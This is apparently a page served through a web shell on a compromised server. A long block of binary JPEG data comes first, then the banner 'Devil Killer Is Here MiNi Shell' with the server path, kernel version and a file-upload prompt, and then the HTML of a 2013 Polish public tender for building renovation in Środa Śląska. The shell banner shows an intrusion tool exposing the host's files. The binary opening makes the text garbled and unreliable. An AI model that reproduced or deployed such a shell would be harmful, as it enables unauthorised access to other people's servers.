JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130104/6004-N-2013.html

<p class="kh_header"><b>Środa Śląska: Rewitalizacja miasta Środa Śląska</b><br>
<b>Numer ogłoszenia: 6004 - 2013; data zamieszczenia: 04.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Środa Śląska , Plac Wolności 5, 55-300 Środa Śląska, woj. dolnośląskie, tel. 71 3960724, faks 71 3173405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.srodaslaska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja miasta Środa Śląska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie - rewitalizacja budynku wielorodzinnego przy ul. Daszyńskiego 23 w Środzie Śląskiej obejmuje wykonanie następujących prac budowlanych : wymiana stropów nad parterem, montaż stropu nad parterem, roboty budowlane w mieszkaniu nr 1, roboty budowlane  w  pomieszczeniu  gospodarczym, wymiana stropu nad I piętrem - roboty rozbiórkowe i demontażowe, montaż stropu nad I piętrem, roboty budowlane w mieszkaniu nr 2 , roboty budowlane w mieszkaniu nr 3 , wymiana nadproży - parter, roboty budowlane korytarza i klatki schodowej na parterze,roboty budowlane korytarza i klatki schodowej na piętrze, roboty budowlane strychu, roboty budowlane dachu, roboty budowlane elewacji , roboty budowlane piwnic, wszystkie roboty wyszczególnione w przedmiarach robót. Roboty należy podzielić zgodnie z załączonym do SIWZ załącznikiem na roboty kwalifikowane oraz roboty nie kwalifikowane. Suma pozycji robót oraz obmiar robót po podziale winna być równa sumie pozycji wyszczególnionych w przedmiarach robót w/w zadania.

Zadanie - rewitalizacja budynków wielorodzinnych  w zakresie remontu elewacji budynku przy ul Kolejowej 20 w Środzie Śląskiej wraz z remontami klatek schodowych ( Daszyńskiego 30,  Daszyńskiego 32, Daszyńskiego 34, Strzelecka 21, Świdnicka 18a , Świdnicka 21 , Żwirki i Wigury 3 obejmuje następujący zakres prac budowlanych :
Budynek wielorodzinny przy ul. Kolejowej 20 remont elewacji - roboty demontażowe i przygotowawcze, naprawa uszkodzonych w murze cegieł, obsadzenie kratek wentylacyjnych w ścianach , demontaż i montaż kominków wentylacyjnych, zabezpieczenie przyłącza energetycznego napowietrznego, rozebranie i montaż rur spustowych kanalizacji deszczowej , rozebranie i wykonanie daszków ochronnych nad wejściem do budynku, odbicie tynków zewnętrznych,  obsadzenie narożników stalowych w  ścianach z cegieł - wzmocnienie nadproży, naprawa uszkodzonych w murze powierzchni, przemurowania ciągłe pęknięć, gruntowanie powierzchni zewnętrznych , wykonanie tynków zewnętrznych zwykłych kat III  na sianach płaskich, wykonanie obróbek blacharskich, malowanie tynków zewnętrznych farbami sylikonowymi oraz wszystkie prace wyszczególnione w przedmiarach robót.
Budynek wielorodzinny przy ul. Daszyńskiego 30 remont klatki schodowej - odbicie tynków wewnętrznych ścian, odbicie tynków wewnętrznych na stropach biegach i spocznikach, wykonanie okładzin stropów, biegów i spoczników za pomocą systemu gipsowo kartonowego, obudowa słupów i ścian w systemie GK, wykonanie gruntowania ścian i sufitów, wykonanie tynków i gładzi wewnętrznych, malowanie wewnętrzne farbami emulsyjnymi, wymiana okien skrzynkowych na okna rozwieralno uchylne z PCV, obsadzenie podokienników, wymiana ościeżnicy wraz z skrzydłem drzwiowym , wymiana elementów schodów drewnianych, malowanie schodów drewnianych farbą olejną , wykonanie posadzki z płytek gresowych wraz z rozbiórką istniejącej posadzki , wykonanie cokolików posadzki , naprawa podłogi drewnianej przez nadbicie płyty OSB i wykonanie okładziny z tworzyw sztucznych, wywóz gruzu , wykonanie instalacji oświetlenia klatki schodowej  wraz z demontażem istniejącej. 
Budynek wielorodzinny przy ul. Daszyńskiego 32 remont klatki schodowej - odbicie tynków wewnętrznych na ścianach, odbicie tynków wewnętrznych na sufitach , spocznikach , biegach, wykonanie okładzin stropu drewnianego, ścian , słupów, belek i podciągów , wykonanie tynków wewnętrznych na ścianach, gruntowanie ścian i sufitów , biegów , spoczników, malowanie farbami emulsyjnymi i lateksowymi , wymiana ościeżnicy wraz z skrzydłem drzwiowym, wykonanie remontu schodów wewnętrznych wraz z odtworzeniem części schodów, malowanie schodów farbą olejną , wykonanie remontu posadzki wraz z wyłożeniem posadzki z płytek gresowych , wykonanie remontu podłogi drewnianej wraz z wykonaniem okładziny z tworzyw sztucznych, wymiana elementów wsporczych przykrycia zejścia do piwnicy, wykonanie przykrycia zejścia do piwnicy, wykonanie wymiany instalacji elektrycznej części wspólnych klatki schodowej,wykonanie drobnych robót instalacji sanitarnej - demontaż i montaż miski ustępowej wraz z spłuczką , wywiezienie gruzu.
Budynek wielorodzinny przy ul. Daszyńskiego 34 remont klatki schodowej - odbicie tynków wewnętrznych na ścianach, odbicie tynków wewnętrznych na sufitach , spocznikach , biegach, wykonanie okładzin stropu drewnianego, ścian , słupów, belek i podciągów , wykonanie tynków wewnętrznych na ścianach, gruntowanie ścian i sufitów , biegów , spoczników, malowanie farbami emulsyjnymi i lateksowymi, wymiana drzwi zewnętrznych, wykonanie remontu posadzki wraz z wyłożeniem posadzki z płytek gresowych , wykonanie remontu podłogi drewnianej wraz z wykonaniem okładziny z tworzyw sztucznych, wywóz gruzu , wykonanie instalacji oświetlenia klatki schodowej  wraz z demontażem istniejącej. 
Budynek wielorodzinny przy ul. Strzelecka 21 remont klatki schodowej odbicie tynków wewnętrznych na ścianach, odbicie tynków wewnętrznych na sufitach , spocznikach , biegach, wykonanie okładzin stropu drewnianego,wykonanie tynków wewnętrznych na ścianach, gruntowanie ścian i sufitów , biegów , spoczników, malowanie farbami emulsyjnymi i olejnymi, wymiana okien skrzynkowych na okna rozwieralno uchylne z PCV, obsadzenie podokienników,wymiana ościeżnicy wraz z skrzydłem drzwiowym , malowanie farbą olejną stolarki drewnianej, malowanie farbą olejną rur wodociągowych oraz grzejników, wykonanie remontu posadzki wraz z wyłożeniem posadzki z płytek gresowych, wywóz gruzu , wykonanie instalacji oświetlenia klatki schodowej  wraz z demontażem istniejącej. 
Budynek wielorodzinny przy ul. Świdnicka 18a remont klatki schodowej - odbicie tynków wewnętrznych na ścianach, odbicie tynków wewnętrznych na sufitach , spocznikach , biegach, wykonanie okładzin stropu drewnianego,wykonanie gruntowania ścian i sufitów, wykonanie tynków i gładzi wewnętrznych, malowanie wewnętrzne farbami emulsyjnymi, wymiana okien skrzynkowych na okna rozwieralno uchylne z PCV, obsadzenie podokienników, wykonanie ścianek działowych w systemie GK , malowanie farbami olejnymi ścian - lamperie oraz elementów drewnianych , wykonanie remontu schodów wewnętrznych wraz z odtworzeniem części schodów, malowanie schodów farbą olejną , wykonanie remontu posadzki wraz z wyłożeniem posadzki z płytek gresowych , rozszklenie otworów okiennych  o ramach drewnianych, szklenie ram drewnianych , wywóz gruzu , wykonanie instalacji oświetlenia klatki schodowej  wraz z demontażem istniejącej. 
Budynek wielorodzinny przy ul. Świdnicka 21 remont klatki schodowej - przygotowanie powierzchni pod malowanie farbami emulsyjnymi starych tynków, wykonanie gruntowania ścian i sufitów,malowanie wewnętrzne farbami emulsyjnymi,  malowanie farbami olejnymi ścian - lamperie oraz elementów drewnianych , wykonanie remontu schodów wewnętrznych wraz z odtworzeniem części schodów, malowanie schodów farbą olejną , wykonanie remontu posadzki wraz z wyłożeniem posadzki z płytek gresowych , wykonanie remontu podłogi drewnianej wraz z wykonaniem okładziny z tworzyw sztucznych, wywóz gruzu ,
Budynek wielorodzinny przy ul. Żwirki i Wigury 3 remont klatki schodowej - wymiana ościeżnic stalowych wraz z skrzydłami drzwiowymi, odbicie tynków wewnętrznych ścian, stropów , biegów i spoczników, wykonanie okładzin w systemie GK stropu, ścian, słupów belek i podciągów, wykonanie tynków wewnętrznych, gruntowanie powierzchni pionowych i poziomych, malowanie wewnętrzne ścian i sufitów, biegów,  wykonanie remontu schodów wewnętrznych ,  wykonanie remontu posadzki wraz z wyłożeniem posadzki z płytek gresowych ,  wywóz gruzu , wykonanie instalacji oświetlenia klatki schodowej  wraz z demontażem istniejącej. 
Zadanie - rewitalizacja budynków wielorodzinnych przy ul. Piastów Śląskich 1,3,5,7,9,11,13,15  w Środzie Śląskiej w zakresie termomodernizacji dachów wraz z wykonaniem prac dekarskich - zadanie obejmuje wykonanie następujących prac : rozebranie obróbek blacharskich, zamontowanie podwaliny 10cm x 16 cm pod okap, wykonanie krycia dachów papą termozgrzewalną wraz z papą podkładową termozgrzewalną w systemie styropapy gr 10 cm ( styropian PS20SE jednostronnie oklejony) - konstrukcja dachu  płyta obornicka , wykonanie obróbek blacharskich z blachy powlekanej - obróbki o szerokości do 25 cm oraz powyżej 25 cm , wykonanie obróbek kominków wentylacyjnych , naprawa rynien bez zdejmowania przez sprawdzenie i polutowanie pęknięć. W zakresie prac wykonawca winien uwzględnić wszelkie prace związane z wykonaniem zadania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.55.00-2, 45.26.23.00-4, 45.26.23.10-7, 45.26.25.22-6, 45.11.10.00-8, 45.41.00.00-4, 45.43.10.00-7, 45.43.21.10-8, 45.43.00.00-0, 45.44.21.00-8, 45.26.21.00-2, 45.31.12.00-2, 45.33.20.00-3, 45.26.10.00-4, 45.22.32.00-8, 45.22.32.10-1, 45.42.20.00-1, 45.42.10.00-4, 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga od Wykonawców
wniesienia wadium w wysokości  18.000, 00 zł (słownie: osiemnaście tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą, że posiadają niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia: wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali 
roboty budowlane w zakresie remontów, przebudowy dachów wraz z wymianą pokrycia dachowego  o łącznej  wartości nie  mniejszej niż  350.000,00 zł brutto, potwierdzonych  dokumentami, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dokument musi potwierdzać wymagany zakres prac, ich wartość, datę wykonania i miejsce realizacji 
oraz że  wykonali roboty budowlane w zakresie robót ogólnobudowlanych zewnętrznych i wewnętrznych     o łącznej  wartości nie  mniejszej niż  350.000,00 zł brutto, potwierdzonych  dokumentami, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dokument musi potwierdzać wymagany zakres prac, ich wartość, datę wykonania i miejsce realizacji 
Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia dokonana zostanie zgodnie z formułą  spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej 1 osobą posiadającą uprawnienia bez ograniczeń w specjalności konstrukcyjno - budowlanej, z doświadczeniem  w kierowaniu robotami 
W/w osoba musi posiadać aktualną przynależnością do Polskiej Izby Inżynierów Budownictwa 
Wykonawca zobligowany jest wypełnić załącznik -  Wykaz osób które będą uczestniczyć w wykonaniu zamówieniu i złożyć oświadczenie zgodnie z załącznikiem i treścią Specyfikacji istotnych warunków zamówienia
Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia dokonana zostanie zgodnie z formułą  spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy   udokumentują, że posiadają opłaconą  polisę, a w przypadku jej braku inny dokument potwierdzający, że  wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności związanej z przedmiotem  zamówienia na  kwotę nie mniejsza  niż 500.000, 00 zł  
Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia dokonana zostanie zgodnie z formułą  spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)   Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w  SIWZ, wykonawca wskazał osoby, którymi będzie dysponował 
2) kosztorys ofertowy szczegółowy. Dopisywanie pozycji lub ich nie ujmowanie może być wystarczającą podstawą do odrzucenia oferty),
3) dowód wniesienia wadium, 
4) oświadczenie o wniesieniu zabezpieczenia należytego wykonania umowy ,  - załącznik nr 7 do SIWZ, 
5) oświadczenie o przedłożeniu Planu Bezpieczeństwa i Ochrony  Zdrowia oraz szczegółowy  zakres robót budowlanych stanowiących zagrożenie bezpieczeństwa i zdrowia ludzi  - załącznik nr 8 do SIWZ,
6) zaakceptowany projekt umowy (zaparafowana ostatnia strona  umowy) - załącznik nr 6 do siwz. 
7) oświadczenie dla osób fizycznych  - załącznik nr 9
8) harmonogram rzeczowo finansowych załącznik nr 10 do SIWZ
9) pełnomocnictwo do reprezentowania wykonawcy o ile ofertę składa  pełnomocnik. 
Wykonawcy ubiegający się  wspólnie o udzielenie zamówienia  warunek wymieniony w punktach 1, 2, 3,4, 5,  6,  7 i 8  mogą spełnić łącznie,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień  umowy oraz określenie warunków zmian:
IV.3.1) Zmiana przewidzianego terminu zakończenia robót , z uwagi na:
1) zmiany spowodowane warunkami atmosferycznymi, w szczególności:
a) klęskami żywiołowymi;
b) warunkami atmosferycznymi odbiegającymi od typowych, uniemożliwiającymi prowadzenie robót budowlanych, prób i sprawdzeń, dokonywanie odbiorów;
c) przerwania realizacji prac budowlanych przez właściwe organy administracji rządowej, samorządowej bądź prawomocnym wyrokiem sądu, bez winy Wykonawcy.
2) zmianami będącymi następstwem okoliczności leżących po stronie zamawiającego, w szczególności:
a) wstrzymaniem robót przez zamawiającego;
b)wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności np. wystąpienie robót  dodatkowych, których wykonanie będzie konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, a wykonanie wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego   lub zamiennych 
IV.3.2) Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1) siłą wyższą uniemożliwiającą wykonanie przedmiotu umowy zgodnie z siwz;
2) zmianą obowiązującej stawki VAT;
IV.3.3   zmiany kierownika budowy lub inspektora nadzoru dla poszczególnych branż na wniosek zainteresowanych stron;
 IV.3.4.  zmiany podwykonawcy;
    1) na wniosek Wykonawcy; 
    2) na żądanie Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.srodaslaska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Wydział  Zamówień Publicznych;  Plac  Wolności 5, 55-300 Środa Śląska , pok. B-13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2013 godzina 10:00, miejsce: Urząd Miejski, Wydział  Zamówień Publicznych;  Plac  Wolności 5, 55-300 Środa Śląska , pok. B-13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




